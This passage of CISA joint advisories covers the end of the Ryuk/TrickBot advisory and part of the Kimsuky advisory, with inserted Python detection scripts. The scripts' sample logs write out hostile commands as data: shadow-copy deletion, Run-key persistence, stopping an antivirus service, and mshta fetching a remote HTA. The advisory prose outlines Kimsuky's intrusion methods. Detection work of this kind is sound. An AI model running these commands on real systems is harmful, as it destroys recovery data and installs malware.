Ransomware Impacts</a></li> <li><a href="https://protect2.fireeye.com/url?k=2923cea5-7576c7b6-2923ff9a-0cc47adb5650-26d7a0932fe07e31&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=107ba38369&e=7882426b51">HHS - Ransomware Fact Sheet</a></li> <li><a href="https://protect2.fireeye.com/url?k=08e10c16-54b40505-08e13d29-0cc47adb5650-70b9e6fd13ea4f2d&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=bcc423d21d&e=7882426b51">HHS - Cyber Attack Checklist</a></li> <li><a 
href="https://protect2.fireeye.com/url?k=8497e505-d8c2ec16-8497d43a-0cc47adb5650-ba5cee20bcf28bab&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=dc2b43974c&e=7882426b51">HHS - Cyber-Attack Response Infographic</a></li> <li><a href="https://protect2.fireeye.com/url?k=0be33d8b-57b63498-0be30cb4-0cc47adb5650-be7b920b52ab7927&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=c89bf12fa8&e=7882426b51">NIST - Data Integrity Publication</a></li> <li><a href="https://protect2.fireeye.com/url?k=5335b9d4-0f60b0c7-533588eb-0cc47adb5650-bbc2d82317c6bc45&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=eeb05487cf&e=7882426b51">NIST - Guide for Cybersecurity Event Recovery</a></li> <li><a href="https://protect2.fireeye.com/url?k=348a7900-68df7013-348a483f-0cc47adb5650-5210c734b99339b1&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=9f0f789411&e=7882426b51">NIST - Identifying and Protecting Assets Against Ransomware and Other Destructive Events </a></li> <li><a href="https://protect2.fireeye.com/url?k=daf6be91-86a3b782-daf68fae-0cc47adb5650-1f4f5f947a590fa0&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=958743a29c&e=7882426b51">NIST - Detecting and Responding to Ransomware and Other Destructive Events </a></li> <li><a href="https://protect2.fireeye.com/url?k=90b40d5e-cce1044d-90b43c61-0cc47adb5650-bab63aa79a2b0b2a&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=4947ff3a54&e=7882426b51">NIST - Recovering from Ransomware and Other Destructive Events </a></li> <li><a href="https://gist.github.com/aaronst/6aa7f61246f53a8dd4befea86e832456">Github List of IOCs</a></li> </ul> <h3>Revisions</h3> <ul> <li>October 28, 2020: Initial version</li> <li>October 29, 2020: Updated to include information on Conti, TrickBot, and BazarLoader, including new IOCs and Yara Rules for detection</li> <li>November 2, 2020: Updated FBI 
link</li> </ul>
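The Ryuk ATT&amp;CK table in AA20-302A above lists the command lines the ransomware was observed running: `vssadmin Delete Shadows /all /quiet` and `vssadmin resize shadowstorage`, a `cmd.exe`-created entry under the HKCU Run key, `kill.bat`, and anti-virus service stops. As an added example that is not part of the advisory and not CISA, FBI or HHS tooling, the Python below turns those rows into detection rules and runs them over constructed, Sysmon-style process-creation log lines. The `Key=Value | Key=Value` log format, the sample paths, the value name `ExampleValue`, the service name `ExampleAVService` and the `av_service_keywords` parameter are assumptions made for the demonstration, not indicators from the advisory.

```python
"""Flag the Ryuk command lines listed in AA20-302A in process-creation logs.

Added example, not code from the advisory. The '|'-separated Key=Value log
format, the sample paths and the service names below are constructed.
"""
import re

# (ATT&CK id, technique name, regex applied to the CommandLine field).
# Each rule corresponds to a row of the advisory's Ryuk ATT&CK table.
RULES = [
    ("T1490", "Inhibit System Recovery",
     re.compile(r"vssadmin(?:\.exe)?\s+delete\s+shadows\b", re.I)),
    ("T1490", "Inhibit System Recovery",
     re.compile(r"vssadmin(?:\.exe)?\s+resize\s+shadowstorage\b", re.I)),
    ("T1547.001", "Registry Run Keys / Startup Folder",
     re.compile(r"reg(?:\.exe)?\s+add\s+\"?HK(?:EY_CURRENT_USER|CU)\\"
                r"software\\microsoft\\windows\\currentversion\\run\b", re.I)),
    ("T1489", "Service Stop", re.compile(r"\bkill\.bat\b", re.I)),
    ("T1489", "Service Stop",
     re.compile(r"\b(?:net|sc)(?:\.exe)?\s+stop\s+\S+", re.I)),
]

# Captures the service name handed to `net stop` / `sc stop`.
SERVICE_STOP = re.compile(r"\b(?:net|sc)(?:\.exe)?\s+stop\s+\"?([^\s\"]+)", re.I)


def parse_line(line):
    """Split a constructed 'Key=Value | Key=Value' log line into a dict."""
    fields = {}
    for part in line.split("|"):
        key, _, value = part.strip().partition("=")
        if key:
            fields[key.strip()] = value.strip()
    return fields


def match_ryuk_ttps(line, av_service_keywords=()):
    """Return the (id, name) pairs whose rule matches the line's command line.

    av_service_keywords: substrings of service names the caller treats as
    anti-virus related (assumption: supplied per environment, not from the page).
    """
    cmd = parse_line(line).get("CommandLine", "")
    hits = [(tid, name) for tid, name, rx in RULES if rx.search(cmd)]
    stop = SERVICE_STOP.search(cmd)
    if stop and any(k.lower() in stop.group(1).lower() for k in av_service_keywords):
        hits.append(("T1562.001", "Impair Defenses: Disable or Modify Tools"))
    return list(dict.fromkeys(hits))  # de-duplicate, keep order


def scan_log(lines, av_service_keywords=()):
    """Return (line_number, hits, command_line) for every line with a hit."""
    findings = []
    for number, line in enumerate(lines, 1):
        hits = match_ryuk_ttps(line, av_service_keywords)
        if hits:
            findings.append((number, hits, parse_line(line).get("CommandLine", "")))
    return findings


# Constructed sample log, not real telemetry: parent images, paths and the
# registry value name are placeholders chosen for the demonstration.
SAMPLE_LOG = [
    r"EventId=1 | Image=C:\Windows\System32\vssadmin.exe | ParentImage=C:\Windows\System32\cmd.exe | CommandLine=vssadmin Delete Shadows /all /quiet",
    r"EventId=1 | Image=C:\Windows\System32\vssadmin.exe | ParentImage=C:\Windows\System32\cmd.exe | CommandLine=vssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB",
    r"EventId=1 | Image=C:\Windows\System32\cmd.exe | ParentImage=C:\Users\Public\example.exe | CommandLine=cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v ExampleValue /t REG_SZ /d C:\Users\Public\example.exe",
    r"EventId=1 | Image=C:\Windows\System32\cmd.exe | ParentImage=C:\Users\Public\example.exe | CommandLine=cmd.exe /c C:\Users\Public\kill.bat",
    r"EventId=1 | Image=C:\Windows\System32\net.exe | ParentImage=C:\Windows\System32\cmd.exe | CommandLine=net stop ExampleAVService /y",
    r"EventId=1 | Image=C:\Windows\System32\vssadmin.exe | ParentImage=C:\Windows\System32\cmd.exe | CommandLine=vssadmin list shadows",
]

if __name__ == "__main__":
    for number, hits, cmd in scan_log(SAMPLE_LOG, av_service_keywords=("ExampleAV",)):
        print(f"line {number}: {', '.join(f'{t} {n}' for t, n in hits)} <- {cmd}")
```

Only the advisory's own indicators are encoded: shadow-copy deletion or resizing (T1490), a `reg add` under the HKCU Run key (T1547.001), `kill.bat` or any `net stop`/`sc stop` (T1489), and a service stop whose target matches the caller's anti-virus keyword list (T1562.001). `vssadmin list shadows` is deliberately not matched, so routine administration does not trip the rule, and a stop of a non-AV service is reported as T1489 only.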

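The Recommended Mitigation Measures in AA20-302A above direct administrators who find TrickBot to review DNS logs and use the XOR key 0xB9 to decode XOR-encoded DNS requests, revealing Anchor_DNS. As an added example that is not CISA, FBI or HHS code, the Python below performs that decode over constructed DNS query log lines. It assumes the XOR-encoded bytes travel as hexadecimal text in the leftmost labels of the query name (an assumption made for this demonstration; the advisory states only that the requests are XOR-encoded with key 0xB9), and the `timestamp client query: name` log format, the hostnames, client addresses and the sample payload are all constructed.

```python
"""Decode XOR-encoded (key 0xB9) DNS query labels when triaging for Anchor_DNS.

Added example, not code from AA20-302A. Assumption: the XOR-encoded bytes are
carried as hexadecimal text in the leftmost labels of the query name; the
advisory only says the DNS requests are XOR-encoded with key 0xB9. The log
format and every hostname, client address and payload below are constructed.
"""
import re
import string

XOR_KEY = 0xB9
HEX_LABEL = re.compile(r"^[0-9a-fA-F]+$")
PRINTABLE = set(string.printable) - {"\x0b", "\x0c"}
# Constructed log format: "<timestamp> <client-ip> query: <qname>"
LOG_LINE = re.compile(r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+query:\s+(?P<qname>\S+)")


def xor_bytes(data, key=XOR_KEY):
    """XOR every byte with the single-byte key; the operation is its own inverse."""
    return bytes(b ^ key for b in data)


def decode_hex_label(label, min_len=8):
    """Return the XOR-decoded bytes of an even-length hex label, else None.

    Labels shorter than min_len hex characters are ignored because short
    hex-looking words ("cafe", "beef") are common in legitimate hostnames.
    """
    if len(label) < min_len or len(label) % 2 or not HEX_LABEL.match(label):
        return None
    return xor_bytes(bytes.fromhex(label))


def looks_textual(data, threshold=0.9):
    """True when at least `threshold` of the bytes are printable ASCII."""
    if not data:
        return False
    printable = sum(1 for b in data if chr(b) in PRINTABLE)
    return printable / len(data) >= threshold


def decode_query(qname):
    """Decode the leading hex labels of a query name.

    Returns the decoded text when the XOR result reads as text, else None,
    so an unrelated hex-looking label is not reported as a hit.
    """
    chunks = []
    for label in qname.rstrip(".").split("."):
        decoded = decode_hex_label(label)
        if decoded is None:
            break  # the base domain starts here
        chunks.append(decoded)
    data = b"".join(chunks)
    if not data or not looks_textual(data):
        return None
    return data.decode("ascii", errors="replace")


def scan_dns_log(lines):
    """Return one finding per log line whose query name decodes to text."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not in the expected format; skip rather than guess
        decoded = decode_query(m.group("qname"))
        if decoded is not None:
            findings.append({"ts": m.group("ts"), "client": m.group("client"),
                             "qname": m.group("qname"), "decoded": decoded})
    return findings


# Constructed sample: the payload is built here with the same XOR so the
# demonstration is self-contained; it is not a real Anchor_DNS capture.
_PAYLOAD_HEX = xor_bytes(b"host=WS-01;user=jdoe").hex()  # 40 hex characters
SAMPLE_DNS_LOG = [
    "2020-10-28T13:01:02Z 10.0.0.5 query: www.example.com",
    f"2020-10-28T13:01:05Z 10.0.0.5 query: {_PAYLOAD_HEX[:32]}.{_PAYLOAD_HEX[32:]}.c2.example",
    "2020-10-28T13:01:07Z 10.0.0.7 query: deadbeef.example.com",  # hex-looking, not XOR text
    "malformed line that the parser skips",
]

if __name__ == "__main__":
    for finding in scan_dns_log(SAMPLE_DNS_LOG):
        print(f"{finding['ts']} {finding['client']} {finding['qname']} -> {finding['decoded']!r}")
```

The printable-ratio check is what keeps the decoder useful on a busy resolver log: any label made of hex digits can be XORed with 0xB9, but only data that comes out as readable text is reported, so `deadbeef.example.com` is skipped while the two-label payload split across subdomains is reassembled in order and surfaced with the querying client.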
AA20-301A: North Korean Advanced Persistent Threat Focus: Kimsuky
Original release date: October 27, 2020<br/><h3>Summary</h3><p class="tip-intro" style="font-size: 15px;"><em>This advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&amp;CK®) version 7 framework. See the <a href="https://attack.mitre.org/versions/v7/techniques/enterprise/">ATT&amp;CK for Enterprise version 7</a> for all referenced threat actor tactics and techniques.</em></p> <p>This joint cybersecurity advisory was coauthored by the Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the U.S. Cyber Command Cyber National Mission Force (CNMF). This advisory describes the tactics, techniques, and procedures (TTPs) used by North Korean advanced persistent threat (APT) group <a href="https://attack.mitre.org/groups/G0094/">Kimsuky</a>—against worldwide targets—to gain intelligence on various topics of interest to the North Korean government. The U.S. Government refers to malicious cyber activity by the North Korean government as HIDDEN COBRA. For more information on HIDDEN COBRA activity, visit <a href="https://us-cert.cisa.gov/northkorea">https://www.us-cert.cisa.gov/northkorea</a>.</p> <p>This advisory describes known Kimsuky TTPs, as found in open-source and intelligence reporting through July 2020. 
The target audience for this advisory is commercial sector businesses desiring to protect their networks from North Korean APT activity.</p> <p><a href="https://us-cert.cisa.gov/sites/default/files/publications/TLP-WHITE_AA20-301A_North_Korean_APT_Focus_Kimsuky.pdf">Click here</a> for a PDF version of this report.</p> <h4 style="margin-top: 8px; margin-bottom: 8px;">Key Findings</h4> <p>This advisory’s key findings are:</p> <ul> <li>The Kimsuky APT group has most likely been operating since 2012.</li> <li>Kimsuky is most likely tasked by the North Korean regime with a global intelligence gathering mission.</li> <li>Kimsuky employs common social engineering tactics, spearphishing, and watering hole attacks to exfiltrate desired information from victims.[<a href="https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia">1</a>],[<a href="https://cyware.com/news/babyshark-malware-continues-to-target-nuclear-and-cryptocurrency-industries-40e04829">2</a>]</li> <li>Kimsuky is most likely to use spearphishing to gain initial access into victim hosts or networks.[<a href="https://cyware.com/news/babyshark-malware-continues-to-target-nuclear-and-cryptocurrency-industries-40e04829">3</a>]</li> <li>Kimsuky conducts its intelligence collection activities against individuals and organizations in South Korea, Japan, and the United States.</li> <li>Kimsuky focuses its intelligence collection activities on foreign policy and national security issues related to the Korean peninsula, nuclear policy, and sanctions.</li> <li>Kimsuky specifically targets:</li> <li> <ul> <li>Individuals identified as experts in various fields,</li> <li>Think tanks, and</li> <li>South Korean government entities.[<a href="https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia">4</a>],[<a href="https://attack.mitre.org/groups/G0094/">5</a>],[<a href="https://www.securityweek.com/north-korea-suspected-cyber-espionage-attacks-against-south-korean-entities">6</a>],[<a 
href="https://attack.mitre.org/groups/G0094/">7</a>],[<a href="https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf">8</a>]</li> </ul> </li> <li>CISA, FBI, and CNMF recommend individuals and organizations within this target profile increase their defenses and adopt a heightened state of awareness. Particularly important mitigations include safeguards against spearphishing, use of multi-factor authentication, and user awareness training.</li> </ul> <h3>Technical Details</h3><h4>Initial Access</h4> <p>Kimsuky uses various spearphishing and social engineering methods to obtain <em>Initial Access</em> [<a href="https://attack.mitre.org/tactics/TA0001/">TA0001</a>] to victim networks.[<a href="https://blog.malwarebytes.com/threat-analysis/2020/04/apts-and-covid-19-how-advanced-persistent-threats-use-the-coronavirus-as-a-lure/">9</a>],[<a href="https://www.pwc.co.uk/issues/cyber-security-services/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-2.html">10</a>],[<a href="https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf">11</a>] Spearphishing—with a malicious attachment embedded in the email—is the most observed Kimsuky tactic (Phishing: Spearphishing Attachment [<a href="https://attack.mitre.org/versions/v7/techniques/T1566/001/">T1566.001</a>]).[<a href="https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia">12</a>],[<a href="https://attack.mitre.org/groups/G0094/">13</a>]</p> <ul> <li>The APT group has used web hosting credentials—stolen from victims outside of their usual targets—to host their malicious scripts and tools. Kimsuky likely obtained the credentials from the victims via spearphishing and credential harvesting scripts. 
On the victim domains, they have created subdomains mimicking legitimate sites and services they are spoofing, such as Google or Yahoo mail.[14]</li> <li>Kimsuky has also sent benign emails to targets, which were possibly intended to build trust in advance of a follow-on email with a malicious attachment or link. <ul style="list-style-type: circle;"> <li>Posing as South Korean reporters, Kimsuky exchanged several benign interview-themed emails with their intended target to ostensibly arrange an interview date and possibly build rapport. The emails contained the subject line “Skype Interview requests of [Redacted TV Show] in Seoul,” and began with a request to have the recipient appear as a guest on the show. The APT group invited the targets to a Skype interview on the topic of inter-Korean issues and denuclearization negotiations on the Korean Peninsula.</li> <li>After a recipient agreed to an interview, Kimsuky sent a subsequent email with a malicious document, either as an attachment or as a Google Drive link within the body. The document usually contained a variant of BabyShark malware (see the Execution section for information on BabyShark). 
When the date of the interview drew near, Kimsuky sent an email canceling the interview.</li> </ul> </li> <li>Kimsuky tailors its spearphishing and social engineering approaches to use topics relevant to the target, such as COVID-19, the North Korean nuclear program, or media interviews.[<a href="https://cyware.com/news/babyshark-malware-continues-to-target-nuclear-and-cryptocurrency-industries-40e04829">15</a>],[<a href="https://blog.malwarebytes.com/threat-analysis/2020/04/apts-and-covid-19-how-advanced-persistent-threats-use-the-coronavirus-as-a-lure/">16</a>],[<a href="https://www.cyberscoop.com/north-korea-accelerate-commercial-espionage-meet-kims-economic-deadline/">17</a>]</li> </ul> <p>Kimsuky’s other methods for obtaining initial access include login-security-alert-themed phishing emails, watering hole attacks, distributing malware through torrent sharing sites, and directing victims to install malicious browser extensions (<em>Phishing: Spearphishing Link</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1566/002/">T1566.002</a>], <em>Drive-by Compromise</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1189/">T1189</a>], <em>Man-in-the-Browser</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1185/">T1185</a>]).[<a href="https://attack.mitre.org/groups/G0094/">18</a>]</p> <h4 style="margin-top: 8px; margin-bottom: 8px;">Execution</h4> <p>After obtaining initial access, Kimsuky uses <a href="https://attack.mitre.org/software/S0414/">BabyShark</a> malware and PowerShell or the Windows Command Shell for <em>Execution</em> [<a href="https://attack.mitre.org/versions/v7/tactics/TA0002/">TA0002</a>].</p> <ul> <li>BabyShark is Visual Basic Script (VBS)-based malware. 
<ul> <li>First, the compromised host system uses the native Microsoft Windows utility, <code>mshta.exe</code>, to download and execute an HTML application (HTA) file from a remote system (<em>Signed Binary Proxy Execution: Mshta</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1218/005/">T1218.005</a>]).</li> <li>The HTA file then downloads, decodes, and executes the encoded BabyShark VBS file.</li> <li>The script maintains <em>Persistence</em> [<a href="https://attack.mitre.org/versions/v7/tactics/TA0003/">TA0003</a>] by creating a Registry key that runs on startup (<em>Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1547/001/">T1547.001</a>]).</li> <li>It then collects system information (<em>System Information Discovery</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1082">T1082</a>]), sends it to the operator’s command and control (C2) servers, and awaits further commands.[<a href="https://cyware.com/news/babyshark-malware-continues-to-target-nuclear-and-cryptocurrency-industries-40e04829">19</a>],[<a href="https://attack.mitre.org/groups/G0094/">20</a>],[<a href="https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/">21</a>],[<a href="https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/">22</a>]</li> </ul> </li> <li>Open-source reporting indicates BabyShark is delivered via an email message containing a link or an attachment (see the Initial Access section for more information) (<em>Phishing: Spearphishing Link</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1566/002/">T1566.002</a>], <em>Phishing: Spearphishing Attachment</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1566/001">T1566.001</a>]). Kimsuky tailors email phishing messages to match its targets’ interests. Observed targets have been U.S. 
think tanks and the global cryptocurrency industry.[<a href="https://cyware.com/news/babyshark-malware-continues-to-target-nuclear-and-cryptocurrency-industries-40e04829">23</a>]</li> <li>Kimsuky uses PowerShell to run executables downloaded from the internet directly in the target’s memory, without writing them to disk (<em>Command and Scripting Interpreter: PowerShell</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1059/001/">T1059.001</a>]). PowerShell commands/scripts can be executed without invoking <code>powershell.exe</code> through HTA files or <code>mshta.exe</code>.[<a href="https://attack.mitre.org/groups/G0094/">24</a>],[<a href="https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/">25</a>],[<a href="https://www.mcafee.com/blogs/other-blogs/mcafee-labs/what-is-mshta-how-can-it-be-used-and-how-to-protect-against-it/">26</a>],[<a href="https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/">27</a>]</li> </ul> <h4 style="margin-top: 8px; margin-bottom: 8px;">Persistence</h4> <p>Kimsuky has demonstrated the ability to establish <em>Persistence</em> [<a href="https://attack.mitre.org/versions/v7/tactics/TA0003/">TA0003</a>] through using malicious browser extensions, modifying system processes, manipulating autostart execution, using Remote Desktop Protocol (RDP), and changing the default file association for an application. By using these methods, Kimsuky can gain login and password information and/or launch malware outside of some application allowlisting solutions.</p> <ul> <li>In 2018, Kimsuky used an extension, which was available on the Google Chrome Web Store, to infect victims and steal passwords and cookies from their browsers (<em>Man-in-the-Browser</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1185/">T1185</a>]). 
The extension’s reviews gave it a five-star rating; however, the text of the reviews applied to other extensions or was negative. The reviews were likely left by compromised Google+ accounts.[<a href="https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia">28</a>]</li> <li>Kimsuky may install a new service that can execute at startup by using utilities to interact with services or by directly modifying the Registry keys (<em>Boot or Logon Autostart Execution</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1547">T1547</a>]). The service name may be disguised with the name from a related operating system function or by masquerading as benign software. Services may be created with administrator privileges but are executed under system privileges, so an adversary can also use a service to escalate privileges from Administrator to System. They can also directly start services through Service Execution.[<a href="https://attack.mitre.org/groups/G0094/">29</a>],[<a href="https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/">30</a>]</li> <li>During the STOLEN PENCIL operation in May 2018, Kimsuky used the GREASE malware. GREASE is a tool capable of adding a Windows administrator account and enabling RDP while avoiding firewall rules (<em>Remote Services: Remote Desktop Protocol</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1021/001">T1021.001</a>]).[<a href="https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia">31</a>]</li> <li>Kimsuky uses a document stealer module that changes the default program associated with Hangul Word Processor (HWP) documents (<code>.hwp</code> files) in the Registry (<em>Event Triggered Execution: Change Default File Association</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1546/001">T1546.001</a>]). 
Kimsuky manipulates the default Registry setting to open a malicious program instead of the legitimate HWP program (HWP is a Korean word processor). The malware will read and email the content from HWP documents before the legitimate HWP program ultimately opens the document.[<a href="https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/">32</a>] Kimsuky also targets Microsoft Office users by formatting their documents in a <code>.docx</code> file rather than <code>.hwp</code> and will tailor their macros accordingly.[33]</li> <li>Kimsuky maintains access to compromised domains by uploading actor-modified versions of open-source PHP (Hypertext Preprocessor)-based web shells; these web shells enable the APT actor to upload, download, and delete files and directories on the compromised domains (<em>Server Software Component: Web Shell</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1505/003">T1505.003</a>]). The actor often adds “Dinosaur” references within the modified web shell codes.[34]</li> </ul> <h4 style="margin-top: 8px; margin-bottom: 8px;">Privilege Escalation</h4> <p>Kimsuky uses well-known methods for <em>Privilege Escalation</em> [<a href="https://attack.mitre.org/versions/v7/tactics/TA0004/">TA0004</a>]. These methods include placing scripts in the Startup folder, creating and running new services, changing default file associations, and injecting malicious code in <code>explorer.exe</code>.</p> <ul> <li>Kimsuky has used Win7Elevate—an exploit from the Metasploit framework—to bypass User Account Control and inject malicious code into <code>explorer.exe</code> (<em>Process Injection</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1055/">T1055</a>]). This malicious code decrypts its spying library—a collection of keystroke logging and remote control access tools and remote control download and execution tools—from resources, regardless of the victim’s operating system. 
It then saves the decrypted file to disk with a random but hardcoded name (e.g., <code>dfe8b437dd7c417a6d.tmp</code>) in the user’s temporary folder and loads this file as a library, ensuring the tools remain on the system even after a reboot. This allows for the escalation of privileges.[<a href="https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/">35</a>]</li> <li>Before the injection takes place, the malware sets the necessary privileges (see figure 1). The malware writes the path to its malicious Dynamic Link Library (DLL) into the remote process and ensures the DLL is loaded by creating a remote thread within <code>explorer.exe</code> (<em>Process Injection</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1055/">T1055</a>]).[<a href="https://yoroi.company/research/the-north-korean-kimsuky-apt-keeps-threatening-south-korea-evolving-its-ttps/">36</a>]</li> </ul> <p class="text-align-center" style="margin-top: 8px; margin-bottom: 13px;"><em>Figure 1: Privileges set for the injection</em> (image not reproduced) [<a href="https://yoroi.company/research/the-north-korean-kimsuky-apt-keeps-threatening-south-korea-evolving-its-ttps/">37</a>]</p> <h4 style="margin-top: 8px; margin-bottom: 8px;">Defense Evasion</h4> <p>Kimsuky uses well-known and widely available methods for <em>Defense Evasion</em> [<a href="https://attack.mitre.org/versions/v7/tactics/TA0005/">TA0005</a>] within a network. 
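The <code>mshta.exe</code> chain described in the Execution section (mshta fetching a remote HTA, which then launches further script hosts without <code>powershell.exe</code> appearing) and the Mshta bullet of this section both leave the same marks in process-creation telemetry. The following detection logic is an added example written for this advisory, not code from the advisory; it scans constructed Sysmon Event ID 1 style records (Image, CommandLine, ParentImage), and every path, address and file name in the sample records is a placeholder rather than an indicator from this report.

```python
"""Flag mshta.exe proxy-execution patterns in process-creation telemetry.

Added example for this advisory, not code from the advisory or from Kimsuky tooling.
The records below are constructed Sysmon Event ID 1 style dictionaries (Image,
CommandLine, ParentImage); their paths, IP address and file names are placeholders.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# remote content handed to mshta.exe: the first stage of the BabyShark chain
URL_RE = re.compile(r"\b(?:https?|ftp)://", re.IGNORECASE)
# inline script passed on the command line instead of an .hta file
SCRIPT_PROTO_RE = re.compile(r"\b(?:javascript|vbscript):", re.IGNORECASE)
HTA_RE = re.compile(r"\.hta\b", re.IGNORECASE)
# locations a phished user (rather than an installer) can write to
USER_WRITABLE_RE = re.compile(r"\\(?:AppData|Temp|Users\\Public|ProgramData)\\", re.IGNORECASE)
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "hwp.exe"}


@dataclass
class Finding:
    reason: str
    command_line: str


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_event(ev: dict) -> list[Finding]:
    image = basename(ev.get("Image", ""))
    parent = basename(ev.get("ParentImage", ""))
    cmd = ev.get("CommandLine", "")
    findings: list[Finding] = []
    if image == "mshta.exe":
        if URL_RE.search(cmd):
            findings.append(Finding("mshta.exe fetching remote content", cmd))
        if SCRIPT_PROTO_RE.search(cmd):
            findings.append(Finding("mshta.exe running inline script", cmd))
        if HTA_RE.search(cmd) and USER_WRITABLE_RE.search(cmd):
            findings.append(Finding("mshta.exe running HTA from user-writable path", cmd))
        if parent in OFFICE_PARENTS:
            findings.append(Finding(f"mshta.exe spawned by {parent}", cmd))
    # the HTA stage may go on to launch another script host; powershell.exe need not appear
    elif image in {"wscript.exe", "cscript.exe", "powershell.exe"} and parent == "mshta.exe":
        findings.append(Finding(f"{image} spawned by mshta.exe", cmd))
    return findings


def scan(events: list[dict]) -> list[Finding]:
    findings: list[Finding] = []
    for ev in events:
        findings.extend(check_event(ev))
    return findings


SAMPLE_EVENTS = [  # constructed; 198.51.100.7 is a documentation (TEST-NET-2) address
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'mshta.exe "http://198.51.100.7/update.hta"',
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'mshta.exe "C:\Users\user\AppData\Local\Temp\x.hta"',
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'wscript.exe //B "C:\Users\user\AppData\Roaming\run.vbs"',
     "ParentImage": r"C:\Windows\System32\mshta.exe"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe"},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[!] {f.reason}: {f.command_line}")
```

The four rules map directly onto the behaviour the advisory describes: remote content or inline script handed to <code>mshta.exe</code>, an HTA run from a user-writable location, an Office-family parent (the spearphishing attachment), and a second script host spawned by <code>mshta.exe</code>. Tune <code>OFFICE_PARENTS</code> and <code>USER_WRITABLE_RE</code> to the applications and paths in use in your environment.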
These methods include disabling security tools, deleting files, and using Metasploit.[<a href="https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/">38</a>],[<a href="https://attack.mitre.org/groups/G0094/">39</a>]</p> <ul> <li>Kimsuky’s malicious DLL runs at startup to zero (i.e., turn off) the Windows firewall Registry keys (see figure 2). This disables the Windows system firewall and turns off the Windows Security Center service, which prevents the service from alerting the user about the disabled firewall (<em>Impair Defenses: Disable or Modify System Firewall</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1562/004/">T1562.004</a>]).[<a href="https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/">40</a>]</li> </ul> <p class="text-align-center"><em>[Figure 2 image not reproduced. The figure lists four Registry values set to 0: the Windows firewall <code>StandardProfile</code> and <code>PublicProfile</code> keys under <code>SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy</code>, and the AhnLab V3 firewall values <code>FWRunMode</code> and <code>fwmode</code> under <code>HKLM\SOFTWARE\AhnLab</code>.]</em></p> <p class="text-align-center" style="margin-top: 8px; margin-bottom: 13px;"><em>Figure 2: Disabled firewall values in the Registry</em> [<a href="https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/">41</a>]</p> <ul> <li>Kimsuky has used a keylogger that deletes exfiltrated data on disk after it is transmitted to its C2 server (<em>Indicator Removal on Host: File Deletion</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1070/004/">T1070.004</a>]).[<a 
